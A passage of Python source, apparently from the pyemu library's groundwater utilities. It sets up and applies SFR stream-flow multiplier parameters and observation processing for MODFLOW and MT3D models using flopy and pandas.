df_time.loc[idxs, "icomp"] = int(icomp + 1)
# df.loc[df_time.index,"ins_str"] = df_time.apply(lambda x: "l1 w w !sfrc{0}_{1}_{2}! !swgw{0}_{1}_{2}! !gwcn{0}_{1}_{2}!\n".\
# format(x.sfr_node,x.icomp,x.time_str),axis=1)
df.loc[df_time.index, "ins_str"] = df_time.apply(
lambda x: "l1 w w !sfrc{0}_{1}_{2}!\n".format(
x.sfr_node, x.icomp, x.time_str
),
axis=1,
)
df.index = np.arange(df.shape[0])
if ins_file is None:
ins_file = sft_file + ".processed.ins"
with open(ins_file, "w") as f:
f.write("pif ~\nl1\n")
[f.write(i) for i in df.ins_str]
# df = try_process_ins_file(ins_file,sft_file+".processed")
df = try_process_output_file(ins_file, sft_file + ".processed")
return df
def apply_sft_obs():
"""process an mt3d-usgs sft ASCII output file using a previous-written
config file
Returns:
**pandas.DataFrame**: a dataframe of extracted simulated outputs
Note:
This is the companion function to `gw_utils.setup_sft_obs()`.
"""
# this is for dealing with the missing 'e' problem
def try_cast(x):
try:
return float(x)
except:
return 0.0
times = []
with open("sft_obs.config") as f:
sft_file = f.readline().strip()
for line in f:
times.append(float(line.strip()))
df = pd.read_csv(sft_file, skiprows=1, delim_whitespace=True) # ,nrows=10000000)
df.columns = [c.lower().replace("-", "_") for c in df.columns]
df = df.loc[df.time.apply(lambda x: x in times), :]
# print(df.dtypes)
# normalize
for c in df.columns:
# print(c)
if not "node" in c:
df.loc[:, c] = df.loc[:, c].apply(try_cast)
# print(df.loc[df.loc[:,c].apply(lambda x : type(x) == str),:])
if df.dtypes[c] == float:
df.loc[df.loc[:, c] < 1e-30, c] = 0.0
df.loc[df.loc[:, c] > 1e30, c] = 1.0e30
df.loc[:, "sfr_node"] = df.sfr_node.apply(np.int)
df.to_csv(sft_file + ".processed", sep=" ", index=False)
return df
def setup_sfr_seg_parameters(
nam_file, model_ws=".", par_cols=None, tie_hcond=True, include_temporal_pars=None
):
"""Setup multiplier parameters for SFR segment data.
Args:
nam_file (`str`): MODFLOw name file. DIS, BAS, and SFR must be
available as pathed in the nam_file. Optionally, `nam_file` can be
an existing `flopy.modflow.Modflow`.
model_ws (`str`): model workspace for flopy to load the MODFLOW model from
        par_cols ([`str`]): a list of segment data entries to parameterize
tie_hcond (`bool`): flag to use same mult par for hcond1 and hcond2 for a
given segment. Default is `True`.
include_temporal_pars ([`str`]): list of spatially-global multipliers to set up for
each stress period. Default is None
Returns:
**pandas.DataFrame**: a dataframe with useful parameter setup information
Note:
This function handles the standard input case, not all the cryptic SFR options. Loads the
dis, bas, and sfr files with flopy using model_ws.
This is the companion function to `gw_utils.apply_sfr_seg_parameters()` .
        The number (and numbering) of segment data entries must be consistent across
all stress periods.
Writes `nam_file` +"_backup_.sfr" as the backup of the original sfr file
Skips values = 0.0 since multipliers don't work for these
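    Example:
        A sketch parameterizing hcond1 and flow by segment; the nam file and
        workspace names are placeholders::

            import pyemu
            df = pyemu.gw_utils.setup_sfr_seg_parameters(
                "model.nam", model_ws="template", par_cols=["hcond1", "flow"])
            # "sfr_seg_pars.dat.tpl" and "sfr_seg_pars.config" are written to model_ws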
"""
try:
import flopy
except Exception as e:
return
if par_cols is None:
par_cols = ["flow", "runoff", "hcond1", "pptsw"]
if tie_hcond:
if "hcond1" not in par_cols or "hcond2" not in par_cols:
tie_hcond = False
if isinstance(nam_file, flopy.modflow.mf.Modflow) and nam_file.sfr is not None:
m = nam_file
nam_file = m.namefile
model_ws = m.model_ws
else:
# load MODFLOW model # is this needed? could we just pass the model if it has already been read in?
m = flopy.modflow.Modflow.load(
nam_file, load_only=["sfr"], model_ws=model_ws, check=False, forgive=False
)
if include_temporal_pars:
if include_temporal_pars is True:
tmp_par_cols = {col: range(m.dis.nper) for col in par_cols}
elif isinstance(include_temporal_pars, str):
tmp_par_cols = {include_temporal_pars: range(m.dis.nper)}
elif isinstance(include_temporal_pars, list):
tmp_par_cols = {col: range(m.dis.nper) for col in include_temporal_pars}
elif isinstance(include_temporal_pars, dict):
tmp_par_cols = include_temporal_pars
include_temporal_pars = True
else:
tmp_par_cols = {}
include_temporal_pars = False
# make backup copy of sfr file
shutil.copy(
os.path.join(model_ws, m.sfr.file_name[0]),
os.path.join(model_ws, nam_file + "_backup_.sfr"),
)
# get the segment data (dict)
segment_data = m.sfr.segment_data
shape = segment_data[list(segment_data.keys())[0]].shape
# check
for kper, seg_data in m.sfr.segment_data.items():
assert (
seg_data.shape == shape
), "cannot use: seg data must have the same number of entires for all kpers"
seg_data_col_order = list(seg_data.dtype.names)
# convert segment_data dictionary to multi index df - this could get ugly
reform = {
(k, c): segment_data[k][c]
for k in segment_data.keys()
for c in segment_data[k].dtype.names
}
seg_data_all_kper = pd.DataFrame.from_dict(reform)
seg_data_all_kper.columns.names = ["kper", "col"]
# extract the first seg data kper to a dataframe
seg_data = seg_data_all_kper[0].copy() # pd.DataFrame.from_records(seg_data)
# make sure all par cols are found and search of any data in kpers
missing = []
cols = par_cols.copy()
for par_col in set(par_cols + list(tmp_par_cols.keys())):
if par_col not in seg_data.columns:
if par_col in cols:
missing.append(cols.pop(cols.index(par_col)))
if par_col in tmp_par_cols.keys():
_ = tmp_par_cols.pop(par_col)
# look across all kper in multiindex df to check for values entry - fill with absmax should capture entries
else:
seg_data.loc[:, par_col] = (
seg_data_all_kper.loc[:, (slice(None), par_col)]
.abs()
.max(level=1, axis=1)
)
if len(missing) > 0:
warnings.warn(
"the following par_cols were not found in segment data: {0}".format(
",".join(missing)
),
PyemuWarning,
)
if len(missing) >= len(par_cols):
warnings.warn(
"None of the passed par_cols ({0}) were found in segment data.".format(
",".join(par_cols)
),
PyemuWarning,
)
seg_data = seg_data[seg_data_col_order] # reset column orders to inital
seg_data_org = seg_data.copy()
seg_data.to_csv(os.path.join(model_ws, "sfr_seg_pars.dat"), sep=",")
# the data cols not to parameterize
# better than a column indexer as pandas can change column orders
idx_cols = ["nseg", "icalc", "outseg", "iupseg", "iprior", "nstrpts"]
notpar_cols = [c for c in seg_data.columns if c not in cols + idx_cols]
# process par cols
tpl_str, pvals = [], []
if include_temporal_pars:
tmp_pnames, tmp_tpl_str = [], []
tmp_df = pd.DataFrame(
data={c: 1.0 for c in tmp_par_cols.keys()},
index=list(m.sfr.segment_data.keys()),
)
tmp_df.sort_index(inplace=True)
tmp_df.to_csv(os.path.join(model_ws, "sfr_seg_temporal_pars.dat"))
for par_col in set(cols + list(tmp_par_cols.keys())):
print(par_col)
prefix = par_col
if tie_hcond and par_col == "hcond2":
prefix = "hcond1"
if seg_data.loc[:, par_col].sum() == 0.0:
print("all zeros for {0}...skipping...".format(par_col))
# seg_data.loc[:,par_col] = 1
# all zero so no need to set up
if par_col in cols:
# - add to notpar
notpar_cols.append(cols.pop(cols.index(par_col)))
if par_col in tmp_par_cols.keys():
_ = tmp_par_cols.pop(par_col)
if par_col in cols:
seg_data.loc[:, par_col] = seg_data.apply(
lambda x: "~ {0}_{1:04d} ~".format(prefix, int(x.nseg))
if float(x[par_col]) != 0.0
else "1.0",
axis=1,
)
org_vals = seg_data_org.loc[seg_data_org.loc[:, par_col] != 0.0, par_col]
pnames = seg_data.loc[org_vals.index, par_col]
pvals.extend(list(org_vals.values))
tpl_str.extend(list(pnames.values))
if par_col in tmp_par_cols.keys():
parnme = tmp_df.index.map(
lambda x: "{0}_{1:04d}_tmp".format(par_col, int(x))
if x in tmp_par_cols[par_col]
else 1.0
)
sel = parnme != 1.0
tmp_df.loc[sel, par_col] = parnme[sel].map(lambda x: "~ {0} ~".format(x))
tmp_tpl_str.extend(list(tmp_df.loc[sel, par_col].values))
tmp_pnames.extend(list(parnme[sel].values))
pnames = [t.replace("~", "").strip() for t in tpl_str]
df = pd.DataFrame(
{"parnme": pnames, "org_value": pvals, "tpl_str": tpl_str}, index=pnames
)
df.drop_duplicates(inplace=True)
if df.empty:
warnings.warn(
"No spatial sfr segment parameters have been set up, "
"either none of {0} were found or all were zero.".format(
",".join(par_cols)
),
PyemuWarning,
)
# return df
# set not par cols to 1.0
seg_data.loc[:, notpar_cols] = "1.0"
# write the template file
_write_df_tpl(os.path.join(model_ws, "sfr_seg_pars.dat.tpl"), seg_data, sep=",")
# make sure the tpl file exists and has the same num of pars
parnme = parse_tpl_file(os.path.join(model_ws, "sfr_seg_pars.dat.tpl"))
assert len(parnme) == df.shape[0]
# set some useful par info
df["pargp"] = df.parnme.apply(lambda x: x.split("_")[0])
if include_temporal_pars:
_write_df_tpl(
filename=os.path.join(model_ws, "sfr_seg_temporal_pars.dat.tpl"), df=tmp_df
)
pargp = [pname.split("_")[0] + "_tmp" for pname in tmp_pnames]
tmp_df = pd.DataFrame(
data={"parnme": tmp_pnames, "pargp": pargp}, index=tmp_pnames
)
if not tmp_df.empty:
tmp_df.loc[:, "org_value"] = 1.0
tmp_df.loc[:, "tpl_str"] = tmp_tpl_str
df = df.append(tmp_df[df.columns])
if df.empty:
warnings.warn(
"No sfr segment parameters have been set up, "
"either none of {0} were found or all were zero.".format(
",".join(set(par_cols + list(tmp_par_cols.keys())))
),
PyemuWarning,
)
return df
# write the config file used by apply_sfr_pars()
with open(os.path.join(model_ws, "sfr_seg_pars.config"), "w") as f:
f.write("nam_file {0}\n".format(nam_file))
f.write("model_ws {0}\n".format(model_ws))
f.write("mult_file sfr_seg_pars.dat\n")
f.write("sfr_filename {0}\n".format(m.sfr.file_name[0]))
if include_temporal_pars:
f.write("time_mult_file sfr_seg_temporal_pars.dat\n")
# set some useful par info
df.loc[:, "parubnd"] = 1.25
df.loc[:, "parlbnd"] = 0.75
hpars = df.loc[df.pargp.apply(lambda x: x.startswith("hcond")), "parnme"]
df.loc[hpars, "parubnd"] = 100.0
df.loc[hpars, "parlbnd"] = 0.01
return df
def setup_sfr_reach_parameters(nam_file, model_ws=".", par_cols=["strhc1"]):
"""Setup multiplier paramters for reach data, when reachinput option is specififed in sfr.
Args:
nam_file (`str`): MODFLOw name file. DIS, BAS, and SFR must be
available as pathed in the nam_file. Optionally, `nam_file` can be
an existing `flopy.modflow.Modflow`.
model_ws (`str`): model workspace for flopy to load the MODFLOW model from
        par_cols ([`str`]): a list of reach data entries to parameterize.
            Default is ["strhc1"].
Returns:
**pandas.DataFrame**: a dataframe with useful parameter setup information
Note:
        Similar to `gw_utils.setup_sfr_seg_parameters()`, this method applies parameters to SFR reach data
Can load the dis, bas, and sfr files with flopy using model_ws. Or can pass a model object
(SFR loading can be slow)
This is the companion function of `gw_utils.apply_sfr_reach_parameters()`
Skips values = 0.0 since multipliers don't work for these
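    Example:
        A sketch parameterizing strhc1 by reach; the nam file and workspace names
        are placeholders::

            import pyemu
            df = pyemu.gw_utils.setup_sfr_reach_parameters(
                "model.nam", model_ws="template", par_cols=["strhc1"])
            # "sfr_reach_pars.dat.tpl" and "sfr_reach_pars.config" are written to model_ws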
"""
try:
import flopy
except Exception as e:
return
if par_cols is None:
par_cols = ["strhc1"]
if isinstance(nam_file, flopy.modflow.mf.Modflow) and nam_file.sfr is not None:
# flopy MODFLOW model has been passed and has SFR loaded
m = nam_file
nam_file = m.namefile
model_ws = m.model_ws
else:
# if model has not been passed or SFR not loaded # load MODFLOW model
m = flopy.modflow.Modflow.load(
nam_file, load_only=["sfr"], model_ws=model_ws, check=False, forgive=False
)
# get reachdata as dataframe
reach_data = pd.DataFrame.from_records(m.sfr.reach_data)
    # write initial reach_data as csv
reach_data_orig = reach_data.copy()
reach_data.to_csv(os.path.join(m.model_ws, "sfr_reach_pars.dat"), sep=",")
# generate template file with pars in par_cols
# process par cols
tpl_str, pvals = [], []
# par_cols=["strhc1"]
idx_cols = ["node", "k", "i", "j", "iseg", "ireach", "reachID", "outreach"]
# the data cols not to parameterize
notpar_cols = [c for c in reach_data.columns if c not in par_cols + idx_cols]
# make sure all par cols are found and search of any data in kpers
missing = []
cols = par_cols.copy()
for par_col in par_cols:
if par_col not in reach_data.columns:
missing.append(par_col)
cols.remove(par_col)
if len(missing) > 0:
warnings.warn(
"the following par_cols were not found in reach data: {0}".format(
",".join(missing)
),
PyemuWarning,
)
if len(missing) >= len(par_cols):
warnings.warn(
"None of the passed par_cols ({0}) were found in reach data.".format(
",".join(par_cols)
),
PyemuWarning,
)
for par_col in cols:
if par_col == "strhc1":
prefix = "strk" # shorten par
else:
prefix = par_col
reach_data.loc[:, par_col] = reach_data.apply(
lambda x: "~ {0}_{1:04d} ~".format(prefix, int(x.reachID))
if float(x[par_col]) != 0.0
else "1.0",
axis=1,
)
org_vals = reach_data_orig.loc[reach_data_orig.loc[:, par_col] != 0.0, par_col]
pnames = reach_data.loc[org_vals.index, par_col]
pvals.extend(list(org_vals.values))
tpl_str.extend(list(pnames.values))
pnames = [t.replace("~", "").strip() for t in tpl_str]
df = pd.DataFrame(
{"parnme": pnames, "org_value": pvals, "tpl_str": tpl_str}, index=pnames
)
df.drop_duplicates(inplace=True)
if df.empty:
warnings.warn(
"No sfr reach parameters have been set up, either none of {0} were found or all were zero.".format(
",".join(par_cols)
),
PyemuWarning,
)
else:
# set not par cols to 1.0
reach_data.loc[:, notpar_cols] = "1.0"
# write the template file
_write_df_tpl(
os.path.join(model_ws, "sfr_reach_pars.dat.tpl"), reach_data, sep=","
)
# write the config file used by apply_sfr_pars()
with open(os.path.join(model_ws, "sfr_reach_pars.config"), "w") as f:
f.write("nam_file {0}\n".format(nam_file))
f.write("model_ws {0}\n".format(model_ws))
f.write("mult_file sfr_reach_pars.dat\n")
f.write("sfr_filename {0}".format(m.sfr.file_name[0]))
# make sure the tpl file exists and has the same num of pars
parnme = parse_tpl_file(os.path.join(model_ws, "sfr_reach_pars.dat.tpl"))
assert len(parnme) == df.shape[0]
# set some useful par info
df.loc[:, "pargp"] = df.parnme.apply(lambda x: x.split("_")[0])
df.loc[:, "parubnd"] = 1.25
df.loc[:, "parlbnd"] = 0.75
hpars = df.loc[df.pargp.apply(lambda x: x.startswith("strk")), "parnme"]
df.loc[hpars, "parubnd"] = 100.0
df.loc[hpars, "parlbnd"] = 0.01
return df
def apply_sfr_seg_parameters(seg_pars=True, reach_pars=False):
"""apply the SFR segement multiplier parameters.
Args:
seg_pars (`bool`, optional): flag to apply segment-based parameters.
Default is True
reach_pars (`bool`, optional): flag to apply reach-based parameters.
Default is False
Returns:
**flopy.modflow.ModflowSfr**: the modified SFR package instance
Note:
Expects "sfr_seg_pars.config" to exist
Expects `nam_file` +"_backup_.sfr" to exist
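    Example:
        A sketch of the runtime call, typically made from the forward run script in
        the directory containing "sfr_seg_pars.config" (written by
        `setup_sfr_seg_parameters()`)::

            import pyemu
            sfr = pyemu.gw_utils.apply_sfr_seg_parameters(seg_pars=True, reach_pars=False)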
"""
if not seg_pars and not reach_pars:
raise Exception(
"gw_utils.apply_sfr_pars() error: both seg_pars and reach_pars are False"
)
# if seg_pars and reach_pars:
# raise Exception("gw_utils.apply_sfr_pars() error: both seg_pars and reach_pars are True")
import flopy
bak_sfr_file, pars = None, None
if seg_pars:
assert os.path.exists("sfr_seg_pars.config")
with open("sfr_seg_pars.config", "r") as f:
pars = {}
for line in f:
line = line.strip().split()
pars[line[0]] = line[1]
bak_sfr_file = pars["nam_file"] + "_backup_.sfr"
# m = flopy.modflow.Modflow.load(pars["nam_file"],model_ws=pars["model_ws"],load_only=["sfr"],check=False)
m = flopy.modflow.Modflow.load(pars["nam_file"], load_only=[], check=False)
sfr = flopy.modflow.ModflowSfr2.load(os.path.join(bak_sfr_file), m)
sfrfile = pars["sfr_filename"]
mlt_df = pd.read_csv(pars["mult_file"], delim_whitespace=False, index_col=0)
# time_mlt_df = None
# if "time_mult_file" in pars:
# time_mult_file = pars["time_mult_file"]
# time_mlt_df = pd.read_csv(pars["time_mult_file"], delim_whitespace=False,index_col=0)
idx_cols = ["nseg", "icalc", "outseg", "iupseg", "iprior", "nstrpts"]
present_cols = [c for c in idx_cols if c in mlt_df.columns]
mlt_cols = mlt_df.columns.drop(present_cols)
for key, val in m.sfr.segment_data.items():
df = pd.DataFrame.from_records(val)
df.loc[:, mlt_cols] *= mlt_df.loc[:, mlt_cols]
val = df.to_records(index=False)
sfr.segment_data[key] = val
if reach_pars:
assert os.path.exists("sfr_reach_pars.config")
with open("sfr_reach_pars.config", "r") as f:
r_pars = {}
for line in f:
line = line.strip().split()
r_pars[line[0]] = line[1]
        if bak_sfr_file is None:  # will be the case if seg_pars is False
bak_sfr_file = r_pars["nam_file"] + "_backup_.sfr"
# m = flopy.modflow.Modflow.load(pars["nam_file"],model_ws=pars["model_ws"],load_only=["sfr"],check=False)
m = flopy.modflow.Modflow.load(
r_pars["nam_file"], load_only=[], check=False
)
sfr = flopy.modflow.ModflowSfr2.load(os.path.join(bak_sfr_file), m)
sfrfile = r_pars["sfr_filename"]
r_mlt_df = pd.read_csv(r_pars["mult_file"], sep=",", index_col=0)
r_idx_cols = ["node", "k", "i", "j", "iseg", "ireach", "reachID", "outreach"]
r_mlt_cols = r_mlt_df.columns.drop(r_idx_cols)
r_df = pd.DataFrame.from_records(m.sfr.reach_data)
r_df.loc[:, r_mlt_cols] *= r_mlt_df.loc[:, r_mlt_cols]
sfr.reach_data = r_df.to_records(index=False)
# m.remove_package("sfr")
if pars is not None and "time_mult_file" in pars:
time_mult_file = pars["time_mult_file"]
time_mlt_df = pd.read_csv(time_mult_file, delim_whitespace=False, index_col=0)
for kper, sdata in m.sfr.segment_data.items():
assert kper in time_mlt_df.index, (
"gw_utils.apply_sfr_seg_parameters() error: kper "
+ "{0} not in time_mlt_df index".format(kper)
)
for col in time_mlt_df.columns:
sdata[col] *= time_mlt_df.loc[kper, col]
sfr.write_file(filename=sfrfile)
return sfr
def apply_sfr_parameters(seg_pars=True, reach_pars=False):
"""thin wrapper around `gw_utils.apply_sfr_seg_parameters()`
Args:
seg_pars (`bool`, optional): flag to apply segment-based parameters.
Default is True
reach_pars (`bool`, optional): flag to apply reach-based parameters.
Default is False
Returns:
**flopy.modflow.ModflowSfr**: the modified SFR package instance
Note:
Expects "sfr_seg_pars.config" to exist
Expects `nam_file` +"_backup_.sfr" to exist
"""
sfr = apply_sfr_seg_parameters(seg_pars=seg_pars, reach_pars=reach_pars)
return sfr
def setup_sfr_obs(
sfr_out_file, seg_group_dict=None, ins_file=None, model=None, include_path=False
):
"""setup observations using the sfr ASCII output file. Setups
the ability to aggregate flows for groups of segments. Applies
    only flow to aquifer and flow out.
Args:
        sfr_out_file (`str`): the name and path to an existing SFR output file
seg_group_dict (`dict`): a dictionary of SFR segements to aggregate together for a single obs.
the key value in the dict is the base observation name. If None, all segments
are used as individual observations. Default is None
model (`flopy.mbase`): a flopy model. If passed, the observation names will have
the datetime of the observation appended to them. If None, the observation names
will have the stress period appended to them. Default is None.
include_path (`bool`): flag to prepend sfr_out_file path to sfr_obs.config. Useful for setting up
process in separate directory for where python is running.
Returns:
**pandas.DataFrame**: dataframe of observation name, simulated value and group.
Note:
This is the companion function of `gw_utils.apply_sfr_obs()`.
This function writes "sfr_obs.config" which must be kept in the dir where
"gw_utils.apply_sfr_obs()" is being called during the forward run
"""
sfr_dict = load_sfr_out(sfr_out_file)
kpers = list(sfr_dict.keys())
kpers.sort()
if seg_group_dict is None:
seg_group_dict = {"seg{0:04d}".format(s): s for s in sfr_dict[kpers[0]].segment}
else:
warnings.warn(
"Flow out (flout) of grouped segments will be aggregated... ", PyemuWarning
)
sfr_segs = set(sfr_dict[list(sfr_dict.keys())[0]].segment)
keys = ["sfr_out_file"]
if include_path:
values = [os.path.split(sfr_out_file)[-1]]
else:
values = [sfr_out_file]
for oname, segs in seg_group_dict.items():
if np.isscalar(segs):
segs_set = {segs}
segs = [segs]
else:
segs_set = set(segs)
diff = segs_set.difference(sfr_segs)
if len(diff) > 0:
raise Exception(
"the following segs listed with oname {0} where not found: {1}".format(
oname, ",".join([str(s) for s in diff])
)
)
for seg in segs:
keys.append(oname)
values.append(seg)
df_key = pd.DataFrame({"obs_base": keys, "segment": values})
if include_path:
pth = os.path.join(*[p for p in os.path.split(sfr_out_file)[:-1]])
config_file = os.path.join(pth, "sfr_obs.config")
else:
config_file = "sfr_obs.config"
print("writing 'sfr_obs.config' to {0}".format(config_file))
df_key.to_csv(config_file)
bd = "."
if include_path:
bd = os.getcwd()
os.chdir(pth)
try:
df = apply_sfr_obs()
except Exception as e:
os.chdir(bd)
raise Exception("error in apply_sfr_obs(): {0}".format(str(e)))
os.chdir(bd)
if model is not None:
dts = (
pd.to_datetime(model.start_datetime)
+ pd.to_timedelta(np.cumsum(model.dis.perlen.array), unit="d")
).date
df.loc[:, "datetime"] = df.kper.apply(lambda x: dts[x])
df.loc[:, "time_str"] = df.datetime.apply(lambda x: x.strftime("%Y%m%d"))
else:
df.loc[:, "time_str"] = df.kper.apply(lambda x: "{0:04d}".format(x))
df.loc[:, "flaqx_obsnme"] = df.apply(
lambda x: "{0}_{1}_{2}".format("fa", x.obs_base, x.time_str), axis=1
)
df.loc[:, "flout_obsnme"] = df.apply(
lambda x: "{0}_{1}_{2}".format("fo", x.obs_base, x.time_str), axis=1
)
if ins_file is None:
ins_file = sfr_out_file + ".processed.ins"
with open(ins_file, "w") as f:
f.write("pif ~\nl1\n")
for fla, flo in zip(df.flaqx_obsnme, df.flout_obsnme):
f.write("l1 w w !{0}! !{1}!\n".format(fla, flo))
df = None
pth = os.path.split(ins_file)[:-1]
pth = os.path.join(*pth)
if pth == "":
pth = "."
bd = os.getcwd()
os.chdir(pth)
df = try_process_output_file(
os.path.split(ins_file)[-1], os.path.split(sfr_out_file + ".processed")[-1]
)
os.chdir(bd)
if df is not None:
df.loc[:, "obsnme"] = df.index.values
df.loc[:, "obgnme"] = df.obsnme.apply(
lambda x: "flaqx" if x.startswith("fa") else "flout"
)
return df
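# --- usage sketch (illustrative only) ----------------------------------------
# A hedged example of setting up aggregated SFR flow observations.  The output
# file name and the segment groupings below are hypothetical placeholders.
def _example_setup_sfr_obs():
    """sketch: aggregate flow-to-aquifer and flow-out obs for two seg groups."""
    seg_groups = {"upstream": [1, 2, 3], "downstream": [4, 5]}  # hypothetical
    df = setup_sfr_obs(
        "freyberg.sfr.out",          # hypothetical SFR ASCII output file
        seg_group_dict=seg_groups,
        model=None,                  # obs names get the stress-period suffix
        include_path=False,
    )
    # df carries obsnme/obgnme columns ready to be added to a control file
    return df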
def apply_sfr_obs():
"""apply the sfr observation process
Args:
None
Returns:
        **pandas.DataFrame**: a dataframe of aggregated sfr segment aquifer and outflow
Note:
This is the companion function of `gw_utils.setup_sfr_obs()`.
Requires `sfr_obs.config`.
Writes `sfr_out_file`+".processed", where `sfr_out_file` is defined in "sfr_obs.config"
"""
assert os.path.exists("sfr_obs.config")
df_key = pd.read_csv("sfr_obs.config", index_col=0)
assert df_key.iloc[0, 0] == "sfr_out_file", df_key.iloc[0, :]
sfr_out_file = df_key.iloc[0, 1]
df_key = df_key.iloc[1:, :]
df_key.loc[:, "segment"] = df_key.segment.apply(np.int)
df_key.index = df_key.segment
seg_group_dict = df_key.groupby(df_key.obs_base).groups
sfr_kper = load_sfr_out(sfr_out_file)
kpers = list(sfr_kper.keys())
kpers.sort()
# results = {o:[] for o in seg_group_dict.keys()}
results = []
for kper in kpers:
df = sfr_kper[kper]
for obs_base, segs in seg_group_dict.items():
agg = df.loc[
segs.values, :
].sum() # still agg flout where seg groups are passed!
# print(obs_base,agg)
results.append([kper, obs_base, agg["flaqx"], agg["flout"]])
df = pd.DataFrame(data=results, columns=["kper", "obs_base", "flaqx", "flout"])
df.sort_values(by=["kper", "obs_base"], inplace=True)
df.to_csv(sfr_out_file + ".processed", sep=" ", index=False)
return df
def load_sfr_out(sfr_out_file, selection=None):
"""load an ASCII SFR output file into a dictionary of kper: dataframes.
Args:
sfr_out_file (`str`): SFR ASCII output file
selection (`pandas.DataFrame`): a dataframe of `reach` and `segment` pairs to
load. If `None`, all reach-segment pairs are loaded. Default is `None`.
Returns:
**dict**: dictionary of {kper:`pandas.DataFrame`} of SFR output.
Note:
        Aggregates flow to aquifer for segments and returns flow out at the
        downstream end of each segment.
"""
assert os.path.exists(sfr_out_file), "couldn't find sfr out file {0}".format(
sfr_out_file
)
tag = " stream listing"
lcount = 0
sfr_dict = {}
if selection is None:
pass
elif isinstance(selection, str):
assert (
selection == "all"
), "If string passed as selection only 'all' allowed: " "{}".format(selection)
else:
assert isinstance(
selection, pd.DataFrame
), "'selection needs to be pandas Dataframe. " "Type {} passed.".format(
type(selection)
)
assert np.all(
[sr in selection.columns for sr in ["segment", "reach"]]
), "Either 'segment' or 'reach' not in selection columns"
with open(sfr_out_file) as f:
while True:
line = f.readline().lower()
lcount += 1
if line == "":
break
if line.startswith(tag):
raw = line.strip().split()
kper = int(raw[3]) - 1
kstp = int(raw[5]) - 1
[f.readline() for _ in range(4)] # skip to where the data starts
lcount += 4
dlines = []
while True:
dline = f.readline()
lcount += 1
if dline.strip() == "":
break
draw = dline.strip().split()
dlines.append(draw)
df = pd.DataFrame(data=np.array(dlines)).iloc[:, [3, 4, 6, 7]]
df.columns = ["segment", "reach", "flaqx", "flout"]
df["segment"] = df.segment.astype(np.int)
df["reach"] = df.reach.astype(np.int)
df["flaqx"] = df.flaqx.astype(np.float)
df["flout"] = df.flout.astype(np.float)
df.index = [
"{0:03d}_{1:03d}".format(s, r)
for s, r in np.array([df.segment.values, df.reach.values]).T
]
# df.index = df.apply(
# lambda x: "{0:03d}_{1:03d}".format(
# int(x.segment), int(x.reach)), axis=1)
if selection is None: # setup for all segs, aggregate
gp = df.groupby(df.segment)
bot_reaches = (
gp[["reach"]]
.max()
.apply(
lambda x: "{0:03d}_{1:03d}".format(
int(x.name), int(x.reach)
),
axis=1,
)
)
# only sum distributed output # take flow out of seg
df2 = pd.DataFrame(
{
"flaqx": gp.flaqx.sum(),
"flout": df.loc[bot_reaches, "flout"].values,
},
index=gp.groups.keys(),
)
# df = df.groupby(df.segment).sum()
df2["segment"] = df2.index
elif isinstance(selection, str) and selection == "all":
df2 = df
else:
seg_reach_id = selection.apply(
lambda x: "{0:03d}_{1:03d}".format(
int(x.segment), int(x.reach)
),
axis=1,
).values
for sr in seg_reach_id:
if sr not in df.index:
s, r = [x.lstrip("0") for x in sr.split("_")]
warnings.warn(
"Requested segment reach pair ({0},{1}) "
"is not in sfr output. Dropping...".format(
int(r), int(s)
),
PyemuWarning,
)
seg_reach_id = np.delete(
seg_reach_id, np.where(seg_reach_id == sr), axis=0
)
df2 = df.loc[seg_reach_id].copy()
if kper in sfr_dict.keys():
print(
"multiple entries found for kper {0}, "
"replacing...".format(kper)
)
sfr_dict[kper] = df2
return sfr_dict
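# --- usage sketch (illustrative only) ----------------------------------------
# Loading a subset of reaches with a selection dataframe.  The file name and
# the segment/reach pairs are hypothetical.
def _example_load_sfr_out_selection():
    """sketch: load only two reach locations from an SFR ASCII output file."""
    import pandas as pd
    selection = pd.DataFrame({"segment": [1, 4], "reach": [1, 2]})
    sfr_dict = load_sfr_out("freyberg.sfr.out", selection=selection)
    # keys are zero-based stress periods; values are dataframes indexed by
    # "SSS_RRR" segment_reach strings with flaqx/flout columns
    first_kper = sorted(sfr_dict.keys())[0]
    return sfr_dict[first_kper]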
def setup_sfr_reach_obs(
sfr_out_file, seg_reach=None, ins_file=None, model=None, include_path=False
):
"""setup observations using the sfr ASCII output file. Setups
sfr point observations using segment and reach numbers.
Args:
        sfr_out_file (`str`): the path and name of an existing SFR output file
seg_reach (varies): a dict, or list of SFR [segment,reach] pairs identifying
locations of interest. If `dict`, the key value in the dict is the base
observation name. If None, all reaches are used as individual observations.
Default is None - THIS MAY SET UP A LOT OF OBS!
model (`flopy.mbase`): a flopy model. If passed, the observation names will
have the datetime of the observation appended to them. If None, the
observation names will have the stress period appended to them. Default is None.
include_path (`bool`): a flag to prepend sfr_out_file path to sfr_obs.config. Useful
for setting up process in separate directory for where python is running.
Returns:
`pd.DataFrame`: a dataframe of observation names, values, and groups
Note:
This is the companion function of `gw_utils.apply_sfr_reach_obs()`.
This function writes "sfr_reach_obs.config" which must be kept in the dir where
"apply_sfr_reach_obs()" is being called during the forward run
"""
if seg_reach is None:
warnings.warn("Obs will be set up for every reach", PyemuWarning)
seg_reach = "all"
elif isinstance(seg_reach, list) or isinstance(seg_reach, np.ndarray):
if np.ndim(seg_reach) == 1:
seg_reach = [seg_reach]
assert (
np.shape(seg_reach)[1] == 2
), "varible seg_reach expected shape (n,2), received {0}".format(
np.shape(seg_reach)
)
seg_reach = pd.DataFrame(seg_reach, columns=["segment", "reach"])
seg_reach.index = seg_reach.apply(
lambda x: "s{0:03d}r{1:03d}".format(int(x.segment), int(x.reach)), axis=1
)
elif isinstance(seg_reach, dict):
seg_reach = pd.DataFrame.from_dict(
seg_reach, orient="index", columns=["segment", "reach"]
)
else:
assert isinstance(
seg_reach, pd.DataFrame
), "'selection needs to be pandas Dataframe. Type {} passed.".format(
type(seg_reach)
)
assert np.all(
[sr in seg_reach.columns for sr in ["segment", "reach"]]
), "Either 'segment' or 'reach' not in selection columns"
sfr_dict = load_sfr_out(sfr_out_file, selection=seg_reach)
kpers = list(sfr_dict.keys())
kpers.sort()
if isinstance(seg_reach, str) and seg_reach == "all":
seg_reach = sfr_dict[kpers[0]][["segment", "reach"]]
seg_reach.index = seg_reach.apply(
lambda x: "s{0:03d}r{1:03d}".format(int(x.segment), int(x.reach)), axis=1
)
keys = ["sfr_out_file"]
if include_path:
values = [os.path.split(sfr_out_file)[-1]]
else:
values = [sfr_out_file]
diff = seg_reach.loc[
seg_reach.apply(
lambda x: "{0:03d}_{1:03d}".format(int(x.segment), int(x.reach))
not in sfr_dict[list(sfr_dict.keys())[0]].index,
axis=1,
)
]
if len(diff) > 0:
for ob in diff.itertuples():
